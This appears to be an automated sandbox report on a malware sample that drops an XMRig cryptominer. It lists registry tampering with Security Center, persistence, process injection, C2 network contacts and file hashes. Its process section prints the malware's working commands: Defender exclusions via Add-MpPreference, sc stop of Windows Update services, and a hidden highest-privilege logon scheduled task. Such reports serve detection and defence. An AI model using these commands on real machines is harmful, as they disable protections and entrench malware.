Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E215.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1471214819.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\13335841.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\712929886.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\188420960.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E215.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E215.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\712929886.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1340 set thread context of 1756 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 1340 set thread context of 2884 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysppvrdnvs.exe | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
| File opened for modification | C:\Windows\sysppvrdnvs.exe | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysppvrdnvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\712929886.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E215.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1471214819.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1471214819.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\dwm.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe"
C:\Users\Admin\AppData\Local\Temp\E215.exe
"C:\Users\Admin\AppData\Local\Temp\E215.exe"
C:\Users\Admin\AppData\Local\Temp\1886311780.exe
C:\Users\Admin\AppData\Local\Temp\1886311780.exe
C:\Windows\sysppvrdnvs.exe
C:\Windows\sysppvrdnvs.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\sc.exe
sc stop UsoSvc
C:\Windows\SysWOW64\sc.exe
sc stop WaaSMedicSvc
C:\Windows\SysWOW64\sc.exe
sc stop wuauserv
C:\Windows\SysWOW64\sc.exe
sc stop DoSvc
C:\Windows\SysWOW64\sc.exe
sc stop BITS /wait
C:\Users\Admin\AppData\Local\Temp\1471214819.exe
C:\Users\Admin\AppData\Local\Temp\1471214819.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\13335841.exe
C:\Users\Admin\AppData\Local\Temp\13335841.exe
C:\Users\Admin\AppData\Local\Temp\712929886.exe
C:\Users\Admin\AppData\Local\Temp\712929886.exe
C:\Users\Admin\AppData\Local\Temp\1742823082.exe
C:\Users\Admin\AppData\Local\Temp\1742823082.exe
C:\Users\Admin\AppData\Local\Temp\188420960.exe
C:\Users\Admin\AppData\Local\Temp\188420960.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Windows\system32\taskeng.exe
taskeng.exe {103BB9A3-FE40-4C36-82CA-CF36EE931D91} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| TJ | 185.177.0.227:40500 | udp | |
| KZ | 37.151.125.66:40500 | tcp | |
| PK | 203.99.175.167:40500 | udp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| IR | 185.71.152.222:40500 | udp | |
| UZ | 90.156.163.121:40500 | udp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 188.18.159.183:40500 | udp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| IR | 5.234.120.235:40500 | udp | |
| KZ | 95.56.39.93:40500 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| AM | 46.71.158.30:40500 | udp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 198.163.204.6:40500 | udp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| UZ | 213.230.97.138:40500 | udp | |
| MX | 189.150.35.54:40500 | udp | |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| BA | 77.221.27.219:40500 | udp | |
| IR | 46.167.144.60:40500 | tcp | |
| N/A | 100.108.127.10:40500 | udp | |
| UZ | 87.237.234.24:40500 | udp | |
| RU | 109.191.209.211:40500 | udp | |
| UZ | 213.230.90.74:40500 | udp | |
| UZ | 217.30.162.161:40500 | udp | |
| UZ | 90.156.162.79:40500 | tcp | |
| UZ | 94.141.68.215:40500 | udp | |
| IR | 5.238.140.68:40500 | udp | |
| UZ | 213.230.120.54:40500 | udp | |
| US | 198.163.200.159:40500 | udp |
Files
C:\Users\Admin\AppData\Local\Temp\E215.exe
| MD5 | 8d8e6c7952a9dc7c0c73911c4dbc5518 |
| SHA1 | 9098da03b33b2c822065b49d5220359c275d5e94 |
| SHA256 | feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278 |
| SHA512 | 91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645 |
memory/2844-9-0x0000000003800000-0x000000000380A000-memory.dmp
memory/2844-8-0x0000000003800000-0x000000000380A000-memory.dmp
\Users\Admin\AppData\Local\Temp\1886311780.exe
| MD5 | 06560b5e92d704395bc6dae58bc7e794 |
| SHA1 | fbd3e4ae28620197d1f02bfc24adaf4ddacd2372 |
| SHA256 | 9eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d |
| SHA512 | b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3 |
memory/2844-27-0x0000000003800000-0x0000000003802000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\1[1]
| MD5 | 1fcb78fb6cf9720e9d9494c42142d885 |
| SHA1 | fef9c2e728ab9d56ce9ed28934b3182b6f1d5379 |
| SHA256 | 84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02 |
| SHA512 | cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3 |
C:\Users\Admin\AppData\Local\Temp\1471214819.exe
| MD5 | cb8420e681f68db1bad5ed24e7b22114 |
| SHA1 | 416fc65d538d3622f5ca71c667a11df88a927c31 |
| SHA256 | 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea |
| SHA512 | baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf |
memory/448-50-0x000000013F3D0000-0x000000013F3D6000-memory.dmp
\Users\Admin\AppData\Local\Temp\13335841.exe
| MD5 | 0c37ee292fec32dba0420e6c94224e28 |
| SHA1 | 012cbdddaddab319a4b3ae2968b42950e929c46b |
| SHA256 | 981d724feebc36777e99513dc061d1f009e589f965c920797285c46d863060d1 |
| SHA512 | 2b60b571c55d0441ba0cfc695f9db5cd12660ebec7effc7e893c3b7a1c6cb6149df487c31b8d748697e260cbc4af29331592b705ea9638f64a711c7a6164628b |
\Users\Admin\AppData\Local\Temp\712929886.exe
| MD5 | 96509ab828867d81c1693b614b22f41d |
| SHA1 | c5f82005dbda43cedd86708cc5fc3635a781a67e |
| SHA256 | a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744 |
| SHA512 | ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca |
\Users\Admin\AppData\Local\Temp\1742823082.exe
| MD5 | 13b26b2c7048a92d6a843c1302618fad |
| SHA1 | 89c2dfc01ac12ef2704c7669844ec69f1700c1ca |
| SHA256 | 1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256 |
| SHA512 | d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455 |
\Users\Admin\AppData\Local\Temp\188420960.exe
| MD5 | c1c2524e6fc9dc3f492248f09cf37d32 |
| SHA1 | fabcb2a675dcb31070d763a2fabc90259921a20d |
| SHA256 | d7c3ed2599c214b4dbcdbb34d2f378cc5a99833cc051143338bf848cc87fda97 |
| SHA512 | ead31dbcd27538dcd734f7568441dc733ae472dbcc475308b69e90f13cc5b1fda5e13afab4241b18006e81b8e52ff9894685a4e8d2cf9161d2b77716119de89f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H7N5H8IO3FWQTLFLR1XO.temp
| MD5 | 9d63c3bf578320a46b95f7e729d0462c |
| SHA1 | bbc9e9430753e119c548ada4ce5c06e2f887c4f8 |
| SHA256 | ce42a286786a50f3d0b3d30866485fad2d7c3c0c721d652fdf4014cf2c7f3ce0 |
| SHA512 | 212ad55b0c7114b5cae3470c846b5432c12a0394fa3c10dd91dd7a54985535a48efe3146cf6c9e6aaebe998465042c067aa7e9983df72ab9643d128bdc7c1d28 |
memory/2768-84-0x000000001B560000-0x000000001B842000-memory.dmp
memory/2768-85-0x0000000001E40000-0x0000000001E48000-memory.dmp
memory/2064-88-0x000000013F3E0000-0x000000013F977000-memory.dmp
memory/2764-97-0x000000001B690000-0x000000001B972000-memory.dmp
memory/2764-98-0x0000000001F30000-0x0000000001F38000-memory.dmp
memory/2884-103-0x00000000000B0000-0x00000000000D0000-memory.dmp
memory/1340-104-0x000000013F680000-0x000000013FC17000-memory.dmp
memory/2884-106-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1756-105-0x0000000140000000-0x0000000140029000-memory.dmp
memory/2884-109-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1756-108-0x0000000140000000-0x0000000140029000-memory.dmp
memory/2884-111-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/2884-113-0x0000000140000000-0x00000001407EF000-memory.dmp